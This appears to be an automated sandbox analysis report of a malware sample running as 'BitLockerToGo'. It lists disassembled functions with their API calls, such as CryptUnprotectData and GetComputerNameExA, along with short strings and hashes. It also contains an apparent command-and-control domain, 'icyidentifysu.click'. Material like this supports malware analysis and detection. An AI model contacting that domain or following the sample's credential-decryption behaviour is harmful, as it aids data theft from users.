Function 0042BA22 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 493
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042BB25
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042BB61
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042BC46

Strings

6, xrefs: 0042C041
<], xrefs: 0042BA6A

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: 6$<]
API String ID: 2243422189-2909389547
Opcode ID: 621842a93ff8ced0cfeaf9eb3e87c0fe3c4dcd6c2d54c0bdc1c65954fa12966e
Instruction ID: 1cec2e3dc27d3c0ec5f885a97094761a0063ba2d9d4689993bd0c37c1048aab9
Opcode Fuzzy Hash: 621842a93ff8ced0cfeaf9eb3e87c0fe3c4dcd6c2d54c0bdc1c65954fa12966e
Instruction Fuzzy Hash: 2EE1013160C3D18AE7358F3598517ABBBD2EFD6304F5888AEC0C997283DB794446CB66

Function 00415211 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 450
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004154F7

Strings

&*82, xrefs: 00415550
]YA, xrefs: 00415957
<9++, xrefs: 0041555B

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: &*82$<9++$]YA
API String ID: 834300711-3660485890
Opcode ID: b615abce1cdbb1baa4d73b894295c0cc9965438dc8952df06c44a1f80821f82c
Instruction ID: f8006e6d85f6fd1f6e886fc3354e934eae3bf83ba45ce965c2848f49bcc84732
Opcode Fuzzy Hash: b615abce1cdbb1baa4d73b894295c0cc9965438dc8952df06c44a1f80821f82c
Instruction Fuzzy Hash: 3EE1F1B16087818FC721DF28C8957EBB7E1BFD5314F18892DE4D987392E73888458B56

Function 00420940 Relevance: 6.8, Strings: 5, Instructions: 526
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

., xrefs: 00420D4B
&, xrefs: 00420D50
,, xrefs: 00420E7F
A, xrefs: 00420F23
!@, xrefs: 00420973

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$&$,$.$A
API String ID: 1279760036-963257747
Opcode ID: de5a3cec4c3d21a0aea4e77d73ae0848e2112fb48927a74153fae38c59cfba5a
Instruction ID: 2a66cc601ae997c9be44869362bb330a949229c662bc26c74fe8ddeede9efb52
Opcode Fuzzy Hash: de5a3cec4c3d21a0aea4e77d73ae0848e2112fb48927a74153fae38c59cfba5a
Instruction Fuzzy Hash: CF22D13160C7908FD3248B38D45036FBBE1AB96324F598A2EE5E5873D2D3B98845CB47

Function 0042BA1D Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 499
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042BB61
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042BC46

Strings

6, xrefs: 0042C041

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: ComputerName
String ID: 6
API String ID: 3545744682-498629140
Opcode ID: 35fb6bd53f269a9976b984b5939a46a6e00831035cf16ba3f28e60a547999d65
Instruction ID: 38dc4924b77cc4a343e80aef5c707578bfef320e8ba28539a4aee03f9be0fd01
Opcode Fuzzy Hash: 35fb6bd53f269a9976b984b5939a46a6e00831035cf16ba3f28e60a547999d65
Instruction Fuzzy Hash: 58E1152160C3D18AD735CF3998917ABBBD1EF96304F58896EC0C987383DB789446CB96

Function 0040D76F Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 363
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040D77F

Strings

w@1, xrefs: 0040DA97
icyidentifysu.click, xrefs: 0040DB63

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Uninitialize
String ID: w@1$icyidentifysu.click
API String ID: 3861434553-972618465
Opcode ID: 5a6ede36d1b718381f70dc6588da170c6f117ba54a0749e40254c653adb2b4a0
Instruction ID: 288dab4d58a3fd278ea9672a9f37133dfa3051a537b2e867f60eae80fc95dafa
Opcode Fuzzy Hash: 5a6ede36d1b718381f70dc6588da170c6f117ba54a0749e40254c653adb2b4a0
Instruction Fuzzy Hash: BFB123B5504B818FD715CF6AC490622BFE2FF92314B1985AEC4D29F7A2C778E806CB54

Function 0043D580 Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

@, xrefs: 0043D644
SRQP, xrefs: 0043D662

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: @$SRQP
API String ID: 2994545307-4103095672
Opcode ID: 8d391f0ae4699896911e2fdc63040c7194b95c35fcf732d27ea9fcce4b061ce9
Instruction ID: 520f662993bbb4e5954ca508543e934ad6b602e8f05b31c4d19d327791254f67
Opcode Fuzzy Hash: 8d391f0ae4699896911e2fdc63040c7194b95c35fcf732d27ea9fcce4b061ce9
Instruction Fuzzy Hash: 3B4104B19043009BDB148F24E84276BB7A1FFC9328F15A62DE4A95B391E738DC15878A

Function 0043B1C0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043D3E8,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B1EE

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040CE98 Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

B70FCA7B9A301B2DC683EA0F4CB0333A, xrefs: 0040CF94

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: B70FCA7B9A301B2DC683EA0F4CB0333A
API String ID: 0-4151851655
Opcode ID: c2416ef642491591abf17dd00908a4992512ceddfa07f6a9ada64141ddd3ac97
Instruction ID: b5017b68631502933e5454ec082f6ea5432ff1a9d16e454ca8222f4872775cb4
Opcode Fuzzy Hash: c2416ef642491591abf17dd00908a4992512ceddfa07f6a9ada64141ddd3ac97
Instruction Fuzzy Hash: FD512972A046028BD324CF39CC52577B7F3EF96314B18867ED056A77D6EB38A4428798

Function 0043D7B0 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

SRQP, xrefs: 0043D7D5

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: SRQP
API String ID: 2994545307-1594865775
Opcode ID: b210a77e2b88aa762e1577c6406834ecba7d95de30fd401ab2cb4ed11d2f9a86
Instruction ID: 989ab0c3e68e5812f3ed57fcfafc3cbcd4704314fcbfcacb7c37fac62b62a659
Opcode Fuzzy Hash: b210a77e2b88aa762e1577c6406834ecba7d95de30fd401ab2cb4ed11d2f9a86
Instruction Fuzzy Hash: 1B310834B04300AFE719AB14AC80B7BB7E5EF89714F246A2DE59597391C334FC518749

Function 004104BE Relevance: .9, Instructions: 876COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 932e4a5b420e97a62503815392e64ed88752d231a9022ed5d1d904a50aad47b9
Instruction ID: 68bd57a2ba39256c138cc5f38c4839c498e51ed22ac9d230f379ed8cca7e0228
Opcode Fuzzy Hash: 932e4a5b420e97a62503815392e64ed88752d231a9022ed5d1d904a50aad47b9
Instruction Fuzzy Hash: 83720975604B408FD314DF38C5853A6BBE2AF95314F098A3DD4EBC7792E678A885CB42

Function 004259F0 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: be0a5b7cff1e3ebdef9de0425327d4f69ac6013617aae73960c843f1d5268769
Instruction ID: 3030b71853e9339311f693463ce54af61d3d315cbfab627b3ca9803fb57fb25d
Opcode Fuzzy Hash: be0a5b7cff1e3ebdef9de0425327d4f69ac6013617aae73960c843f1d5268769
Instruction Fuzzy Hash: 06B1AD71B08B249BDB14CF25A84267BB792EFD1310FD9C53EE8859B341E638DD068399

Function 0043E280 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7bf738e8344b3e6fadfe723623a7e3a7ffe147f2c6ebe378e6a9e72281953179
Instruction ID: 7eb4a0fd58c75f9060cff060dca7615373d382c9b2e1994b4d7b58b23dd7aeae
Opcode Fuzzy Hash: 7bf738e8344b3e6fadfe723623a7e3a7ffe147f2c6ebe378e6a9e72281953179
Instruction Fuzzy Hash: 01913431A083409BD728CA25D88167BB7E2EBD9314F18993DE895873D1D638DC05CB86

Function 00439660 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9d9d2e74eede0b19570f8c2f696b0ce1e529deb0e50743a0f9c7b47c62d4366
Instruction ID: 30b144a6756cd02f05d31591d3d0ae8d50670b9ffdec290380815db99b79b4be
Opcode Fuzzy Hash: d9d9d2e74eede0b19570f8c2f696b0ce1e529deb0e50743a0f9c7b47c62d4366
Instruction Fuzzy Hash: 0A717936B042108BD328DE29CC8172BB7D2EBD9720F29963ED5D59B3D2E7749C028785

Function 004366B0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fc75acc7a15fc14c1bf1f841bac3a4d5beddfdc25b8d866ec95784af4dd069d
Instruction ID: eeadd8c84c0f169dde66a51bc2dbb77d8c433a87c4628369f41b20dcea4de0e1
Opcode Fuzzy Hash: 1fc75acc7a15fc14c1bf1f841bac3a4d5beddfdc25b8d866ec95784af4dd069d
Instruction Fuzzy Hash: 5F915C35908346AFCB10CB7CC4513EE7FB1AF4A324F25961ED8A5973D2C33989058B4A

Function 0040A283 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf02f33a1b1daf24cb9931d2c77368c986719a259f34d71f5120d67179880b9b
Instruction ID: 5a51797baa4f70cbea165017b6113697cdba228a7bf23c75e374c08b22add460
Opcode Fuzzy Hash: cf02f33a1b1daf24cb9931d2c77368c986719a259f34d71f5120d67179880b9b
Instruction Fuzzy Hash: 3F713AB6E113119FCB14CFA8CDC269EBFB1EB84310F198179D850BB345C67899068BE5

Function 004183F0 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99e81324b0c1cf33e0573523311454ee194a1e1005c46ec32a071a01332caec5
Instruction ID: 751e2f74ea9cad05592f5d8bb9552b2fb1e8924ab4a69e6f79150cb4c6a0c79f
Opcode Fuzzy Hash: 99e81324b0c1cf33e0573523311454ee194a1e1005c46ec32a071a01332caec5
Instruction Fuzzy Hash: 655114B69042219BC7208F24DC427AB73A1FF96358F08493EF895873A1FB389944C75A

Function 004087A0 Relevance: 7.5, APIs: 5, Instructions: 27
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004087B8
GetCurrentThreadId.KERNEL32 ref: 004087BE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087CD
GetForegroundWindow.USER32(?,00000010,00000000), ref: 004087D3

Part of subcall function 0040B510: FreeLibrary.KERNEL32(004087F9,00000010,00000000), ref: 0040B516
Part of subcall function 0040B510: FreeLibrary.KERNEL32 ref: 0040B537

ExitProcess.KERNEL32 ref: 00408800

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 3676751680-0
Opcode ID: 21bd698dd96b649f409366f4b954b77aa43a9efba90f2450923aa7d9f6643372
Instruction ID: efc7088809ba8cf20e2d707f0df16ced709f8c36e2f02579ccc9f0a6e44102c5
Opcode Fuzzy Hash: 21bd698dd96b649f409366f4b954b77aa43a9efba90f2450923aa7d9f6643372
Instruction Fuzzy Hash: 99E065B464030066D9507BE29D0B71836109F0670BF14143EBBC46E2DBDE7D2498857F

Function 0043AEC5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 0043AF78

Strings

|}~, xrefs: 0043AEF3
#xz, xrefs: 0043AEEB

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID: #xz$|}~
API String ID: 1029625771-3181759514
Opcode ID: 663d1f37cba9ae336453a67d969d0eadb23e5ceb7d3a620db317f36db9321fd2
Instruction ID: 9d6fd7f183629d6f5671af56f8e4d61466d5997296eac2cb3b52d42b2c6829cf
Opcode Fuzzy Hash: 663d1f37cba9ae336453a67d969d0eadb23e5ceb7d3a620db317f36db9321fd2
Instruction Fuzzy Hash: FC21A17664C3058FD708DF68CC9179AB7E1EB86200F04883DA991C7395E674E50EDB5A

Function 00433E3B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00433E77

Strings

]AFG, xrefs: 00433EAB

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: DefaultLanguageUser
String ID: ]AFG
API String ID: 95929093-669045540
Opcode ID: 4679b5e216c382fe734f1540f62582b300b0f6a024146c0e33c0681eb5952257
Instruction ID: 5efb7c02271164443452c92132bb36d5d815bba63d7bab123c99ea9d2f26bed1
Opcode Fuzzy Hash: 4679b5e216c382fe734f1540f62582b300b0f6a024146c0e33c0681eb5952257
Instruction Fuzzy Hash: 3721A170A042948BCB29CF39DD9439E7BB25F9A304F1481EDD44EA3381CB384A858B15

Function 00439600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,EA,?,0041450A,00000400), ref: 00439610

Strings

EA, xrefs: 00439601, 0043960A

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID: EA
API String ID: 1279760036-2114164354
Opcode ID: 3e1ceb89b250fb9d12f092212fcf4fe67dd3e46b0e81a7b895b6807b367db28a
Instruction ID: 072a079bc63fcf67ee4329f4ce4bd41d3d21b92436fb07c3b665bbd367ae41b4
Opcode Fuzzy Hash: 3e1ceb89b250fb9d12f092212fcf4fe67dd3e46b0e81a7b895b6807b367db28a
Instruction Fuzzy Hash: 88C04C31455120BBCA142B15EC05BCA3A549F55263F011066B045660718760AC81C6D8

Function 0040C726 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040C72A
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C877

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 05c4c1416ea442637c99b95b2e70e57e8ad7658d526ce65787b2e92417fc1243
Instruction ID: 7c48f2d6d9308c2411c64d4738aed0816c10745a2db0d8d39336d96daee36388
Opcode Fuzzy Hash: 05c4c1416ea442637c99b95b2e70e57e8ad7658d526ce65787b2e92417fc1243
Instruction Fuzzy Hash: 9541C7B4D10B40AFD370EF399A0B7137EB4AB05250F504B1EF9EA866D4E631A4198BD7

Function 00432187 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004321D2
GetSystemMetrics.USER32 ref: 004321E1

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 5d644a1a770608b13facf271ce148477aa9eaac83cb491c78634d3c21ba9b618
Instruction ID: 25b67dd5c9de23268ffdff418aa0df1ace25e739cbd36745d59bc728b3d50acd
Opcode Fuzzy Hash: 5d644a1a770608b13facf271ce148477aa9eaac83cb491c78634d3c21ba9b618
Instruction Fuzzy Hash: 0811B2F0E142049FDB40EFBCD9466ADBFF4AB48304F00452AE888E7350E734A9588F86

Function 0040C8CA Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C8DC
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C902

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 2113889d20fd7c9c411ab6a2aba348bd901a827719f9c1a9d7cfb8ea4c61774b
Instruction ID: 95cf4bee976dae0bcf9a79aead2fc5f500003fb62c798666b3966767b998ac5e
Opcode Fuzzy Hash: 2113889d20fd7c9c411ab6a2aba348bd901a827719f9c1a9d7cfb8ea4c61774b
Instruction Fuzzy Hash: 7EE067383C83017EF6B84754AC17F1536166B86F22F745315B7653D6E4CAE03159890D

Function 0043B5B5 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043B5B5
GetForegroundWindow.USER32 ref: 0043B5D0

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: eb91c03ac02748fd9a52c84624d36c8f3b0abdddf9006fb09863476707b900f4
Instruction ID: c9c837826981fc4d2580c52c24397bb06af3c9db5131d6b4f1e0de87f73497d6
Opcode Fuzzy Hash: eb91c03ac02748fd9a52c84624d36c8f3b0abdddf9006fb09863476707b900f4
Instruction Fuzzy Hash: A8D05EECE2000057C744AB61FC4B4173629D797309715953AFC0782312D536E428858B

Function 0043B162 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64d04505e51facc5b32f2d46e3ea49eda4a71b90d2ad25abc0127d4398331492
Instruction ID: a1e78b3ceb65990a0dc15ec4eb894bfdfd4cd795acfd92ef14c0ecb3ae398032
Opcode Fuzzy Hash: 64d04505e51facc5b32f2d46e3ea49eda4a71b90d2ad25abc0127d4398331492
Instruction Fuzzy Hash: CBE02676595510BAD6152F38BC0BB2B36249F97B63F02243AF40190026EB6ED801C1DF

Function 0042F31C Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042F35F

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: a5e332c65244988efad0a3fad62dab6d46846a63c729a6b1c9e9e974a5697ce1
Instruction ID: b0e67e51cabac05ef7007a9fd91dfbb9b9c3aa36a7932c1a17be2c81c6bee5d5
Opcode Fuzzy Hash: a5e332c65244988efad0a3fad62dab6d46846a63c729a6b1c9e9e974a5697ce1
Instruction Fuzzy Hash: 7CF098B45097029FE314DF25D5A8B1ABBF1BB84304F10881CE5998B391D7B5A548CF82

Function 0042FB82 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042FBC7

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: b9ace7e5ecfa49b5e397008da619b278df4797f36f2894134675a55ea546d02c
Instruction ID: 14902b2bb6b259fc0b89299fd859114d3daed4383d8227e32e78047560e3e05d
Opcode Fuzzy Hash: b9ace7e5ecfa49b5e397008da619b278df4797f36f2894134675a55ea546d02c
Instruction Fuzzy Hash: 25F074B45093419FE314DF61D5A871BBBE1FBC8308F20891CE0980B695C3B996498F82

Function 00439632 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0043964B

Memory Dump Source

Source File: 00000004.00000002.2157453352.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0ab2c1de21248f5cc5ebcf9bf3fcb36daf71926275e6500f406ad94933e9c0d7
Instruction ID: def4dad81fe2a48fb23eafc83009012cc86c19b116f157a98ec82edf970c520b
Opcode Fuzzy Hash: 0ab2c1de21248f5cc5ebcf9bf3fcb36daf71926275e6500f406ad94933e9c0d7
Instruction Fuzzy Hash: B9C08C30000622FBC2103F14BC0BB893A20EF02312F0314B1B441A90B1E724CC50C6C8

Non-executed Functions

Function 00411B30 Relevance: 130.8, Strings: 103, Instructions: 2077COMMON

Download Yara Rule

Strings

n, xrefs: 00412FF2
5, xrefs: 00412D6F
}, xrefs: 00411C2C
], xrefs: 0041316A
z, xrefs: 004126A1
^, xrefs: 00413172
B, xrefs: 00413112
h, xrefs: 00412FC2
-, xrefs: 00413751
&, xrefs: 00412CF7
f, xrefs: 00413032
@, xrefs: 00413102
X, xrefs: 00413142
r, xrefs: 00413092
K, xrefs: 0041213E
w, xrefs: 00413351
D, xrefs: 00413A2F
', xrefs: 00412671
p, xrefs: 00413419
x, xrefs: 004133D9
>, xrefs: 00412D37
j, xrefs: 00412FD2
\, xrefs: 00413162
t, xrefs: 00412466
N, xrefs: 004130F2
l, xrefs: 00412FE2
T, xrefs: 00413339
x, xrefs: 00413042
F, xrefs: 00413132
z, xrefs: 004133E9
:, xrefs: 00412D17
<, xrefs: 00412D27
b, xrefs: 00413012
v, xrefs: 004130B2
X, xrefs: 004123EE
F, xrefs: 004133C9
s, xrefs: 00413431
D, xrefs: 004133B9
H, xrefs: 00413359
:, xrefs: 004132C1
d, xrefs: 00413022
~, xrefs: 00412681
|, xrefs: 004133F9
0, xrefs: 00412D47
V, xrefs: 00413349
r, xrefs: 00413429
(, xrefs: 00412FBA
8, xrefs: 00412D07
L, xrefs: 00413379
N, xrefs: 00413389
*, xrefs: 00413769
`, xrefs: 00413002
H, xrefs: 004130C2
Q, xrefs: 00413421
t, xrefs: 004130A2
@, xrefs: 00412822
^, xrefs: 00413309
J, xrefs: 00412B35
e, xrefs: 00411B92
J, xrefs: 004130D2
+, xrefs: 00413761
Y, xrefs: 004123F3
%, xrefs: 00412FAA
3, xrefs: 004132B1
R, xrefs: 00413329
A, xrefs: 00412832
6, xrefs: 00412D77
c, xrefs: 004133B1
Z, xrefs: 00413152
J, xrefs: 00412139
p, xrefs: 00413082
2, xrefs: 00412D57
4, xrefs: 00412D67
J, xrefs: 00413369
j, xrefs: 00412134
L, xrefs: 004130E2
s, xrefs: 00412461
~, xrefs: 00413072
C, xrefs: 00411ED7
~, xrefs: 00413409
,, xrefs: 00413759
\, xrefs: 004132F9
D, xrefs: 00413A3C
B, xrefs: 004133A9
P, xrefs: 00413319
z, xrefs: 00413052
', xrefs: 00411ED2
T, xrefs: 00411D86
r, xrefs: 0041245C
|, xrefs: 00413062
D, xrefs: 00413122
`, xrefs: 0041293A
Z, xrefs: 004132E9
X, xrefs: 004132D9
t, xrefs: 00413439
0, xrefs: 004132D1
x, xrefs: 00412022
Z, xrefs: 00411CBE
U, xrefs: 00412457
@, xrefs: 00413399
N, xrefs: 00413731
~, xrefs: 00412BAC
D, xrefs: 00413502

Memory Dump Source

